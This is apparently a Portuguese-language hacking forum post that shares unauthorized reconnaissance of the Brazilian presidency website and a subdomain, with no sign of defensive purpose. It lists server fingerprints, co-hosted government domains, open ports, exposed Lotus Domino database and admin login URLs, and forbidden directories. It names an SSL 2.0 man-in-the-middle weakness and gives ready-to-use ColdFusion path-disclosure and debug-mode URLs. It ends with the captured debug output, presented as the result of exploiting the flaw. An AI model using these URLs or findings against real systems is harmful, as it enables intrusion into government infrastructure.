Bom Galerinha fiquei um tempinho fora do forum.Mas Sempre vou Acompanhar O Gh Bom vamos lá o que me Interessa
Bom é isso Galerinha Espero Que tenha Gostado e espero Ter ajudado
Código PHP:
ALVO: WWW.PLANALTO.GOV.BR - 200.181.15.9
Sistema Operacional: Windows Server 2008 R2 ou Windows 7
IIS: Microsoft IIS httpd 6.0
Criadores do sistema do site: www.casnav.mar.mil.br - Centro de analises de sistemas navais
Código PHP:
==================================================================================================================
==================================================================================================================
==================================================================================================================
Código PHP:
Reverse IP Domain Check:
200.181.15.9 (linkback)
2ccr.pgr.mpf.gov.br (linkback)
mds.gov.br (linkback)
planalto.gov.br (linkback)
portal.mec.gov.br (linkback)
portal2.tcu.gov.br (linkback)
prouniportal.mec.gov.br (linkback)
www.anatel.gov.br (linkback)
www.bc.gov.br (linkback)
www.bcb.gov.br (linkback)
www.diaadia.pr.gov.br (linkback)
www.diaadiaeducacao.pr.gov.br (linkback)
www.dpf.gov.br (linkback)
www.eletronorte.gov.br (linkback)
www.eln.gov.br (linkback)
www.mds.gov.br (linkback)
www.mma.gov.br (linkback)
www.planalto.gov.br (linkback)
www.policiafederal.gov.br (linkback)
www.presidencia.gov.br (linkback)
www.sefaz.rs.gov.br (linkback)
www.spmulheres.gov.br (linkback)
www2.tcu.gov.br (linkback)
Código PHP:
==================================================================================================================
==================================================================================================================
==================================================================================================================
Código PHP:
SubDominio: www.saj.planalto.gov.br
Sistema Operacional: Linux 2.6.9 - 2.6.27 (precisão 100%)
Portas Abertas:
80/http - Lotus Domino httpd
443/ssl - Lotus Domino httpd
Código PHP:
Arquivos Do Banco de dados:
http://www.saj.planalto.gov.br/log.nsf - Acesso Restrito
http://www.saj.planalto.gov.br/webadmin.nsf - Administração(Login)
http://www.saj.planalto.gov.br/statrep.nsf - Acesso Restrito
http://www.saj.planalto.gov.br/events4.nsf - Acesso Restrito
http://www.saj.planalto.gov.br/names.nsf - Acesso Restrito
http://www.saj.planalto.gov.br/domcfg.nsf/cssLogin - Administração(Login)
http://www.saj.planalto.gov.br/reports.nsf - Acesso Restrito
Código PHP:
planalto.gov.br/catalog.nsf - Directory Catalog
http://www.saj.planalto.gov.br/domcfg.nsf - Web Server Configuration
http://www.saj.planalto.gov.br/quickstart/wwsample.nsf - Water Works Intranet
http://www.saj.planalto.gov.br/quickstart/qstart50.nsf - QuickStart Tutorial
http://www.saj.planalto.gov.br/homepage.nsf - Lotus.Dominio IBM
http://www.saj.planalto.gov.br/help/help65_admin.nsf - Domino 6.5 Administrator Help
Código PHP:
==================================================================================================================
==================================================================================================================
==================================================================================================================
Código PHP:
Diretórios Forbidden:
http://www.planalto.gov.br/downloads/
http://www.planalto.gov.br/new folder/
http://www.planalto.gov.br/ccivil_03/revista/
http://www.planalto.gov.br/gsi/saei/CLAD/
http://www.planalto.gov.br/ccivil_03/_Ato2007-2010/
http://www.planalto.gov.br/ccivil_03/leis/
http://www.planalto.gov.br/ccivil_03/decreto/
http://www.planalto.gov.br/ccivil_03/Leis/LEIS_2001/
http://www.planalto.gov.br/ccivil_03/revista/Rev_84/artigos/
http://www.planalto.gov.br/ccivil_03/revista/Rev_84/MemoriaJuridica/
http://www.planalto.gov.br/ccivil_03/_Ato2011-2014/2012/Decreto/
http://www.planalto.gov.br/consea/3conferencia/exec/
http://www.planalto.gov.br/consea/3conferencia/static/Documentos/
http://www.planalto.gov.br/acpr/pdf/
http://www.planalto.gov.br/gsi/saei/paginas/
http://www.planalto.gov.br/ccivil_03/revista/rev_81/MonoDisTeses/
Código PHP:
Falha: SSL 2.0 deprecated protocol
Porta: 443
Informações: É possivel se passar como servidor e ganhar as senhas do SSL através da tecnica Man-in-Maddle
Código PHP:
Falha: ColdFusion DOS Device File Request System Information Disclosure Vulnerability
Informações: http://www.securityfocus.com/bid/4542/info
Url:http://www.planalto.gov.br/nul.cfm
Url:http://www.planalto.gov.br/nul.dbm
Explicação:
Apresentação de um DOS no arquivo não-existente. Cfm ou. Dbm, fará com que o
anfitrião ColdFusion para retornar uma mensagem
de erro contendo o caminho para a raiz da web (informações confidenciais do sistema).
Código PHP:
Falha: ColdFusion debug Mode Information Disclosure
Informções:É possivel visualizar informações do ColdFusion
URL: www.planalto.gov.br/yHjQIr.cfm?mode=debug
Código PHP:
########
#####Resultado Da Exploração Da Falha:
########
Execution Time:
0 milliseconds
URL Parameters:
MODE=debug
CGI Variables:
AUTH_PASSWORD=
AUTH_TYPE=
AUTH_USER=
CERT_COOKIE=
CERT_FLAGS=
CERT_ISSUER=
CERT_KEYSIZE=
CERT_SECRETKEYSIZE=
CERT_SERIALNUMBER=
CERT_SERVER_ISSUER=
CERT_SERVER_SUBJECT=
CERT_SUBJECT=
CF_TEMPLATE_PATH=D:\Inetpub\wwwPlanalto\yHjQIr.cfm
CONTENT_LENGTH=0
CONTENT_TYPE=
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
HTTP_CACHE_CONTROL=max-age=136800
HTTP_CONNECTION=keep-alive
HTTP_HOST=www.planalto.gov.br
HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0
HTTP_VIA=1.1 localhost.turbonet:8080 (Lusca/LUSCA_HEAD-r14716)
HTTP_X_FORWARDED_FOR=192.168.0.198
HTTPS=off
HTTPS_KEYSIZE=
HTTPS_SECRETKEYSIZE=
HTTPS_SERVER_ISSUER=
HTTPS_SERVER_SUBJECT=
PATH_INFO=/yHjQIr.cfm
PATH_TRANSLATED=D:\Inetpub\wwwPlanalto\yHjQIr.cfm
QUERY_STRING=mode=debug
REMOTE_ADDR=189.70.145.29
REMOTE_HOST=189.70.145.29
REMOTE_USER=
REQUEST_METHOD=GET
SCRIPT_NAME=/yHjQIr.cfm
SERVER_NAME=www.planalto.gov.br
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.0
SERVER_SOFTWARE=Microsoft-IIS/6.0
WEB_SERVER_API=ISAPI
Comment